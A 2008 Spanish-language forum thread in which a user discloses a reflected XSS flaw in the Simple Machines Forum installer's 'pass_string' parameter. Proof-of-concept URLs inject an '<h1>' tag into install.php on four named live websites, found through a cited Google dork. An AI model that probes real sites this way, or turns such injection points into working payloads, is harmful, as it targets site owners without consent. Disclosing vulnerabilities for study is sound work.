Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: WHK en 19 Mayo 2008, 00:24 am


Título: XSS en el instalador de SMF
Publicado por: WHK en 19 Mayo 2008, 00:24 am
Curosiando unos minutos encontré algunos instaladores de smf y me di cuenta que la variable  pass_string tiene XSS en método GET.

POC:
Código:
http://casa.zimzum.es/smf/install.php?obgz=1&pass_string=<h1>WHK
http://www.evolutiv.eu/SMF/install.php?&obgz=1&pass_string=<h1>WHK
http://world-eyes.fr/smf/install.php?obgz=1&pass_string=<h1>WHK
http://www.pelusonas.com/foro/install.php?obgz=1&pass_string=<h1>WHK

Fuente:
http://www.google.cl/search?hl=es&q=allinurl%3Asmf+%2B+install.php

Salu2.

Título: Re: XSS en el instalador de SMF
Publicado por: dimitrix en 19 Mayo 2008, 09:21 am
Muy bueno, pero creo que si algún administrador no borra los archivos de instalación, ese XSS será su menor problemas XD

Muchas gracias de nuevo.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines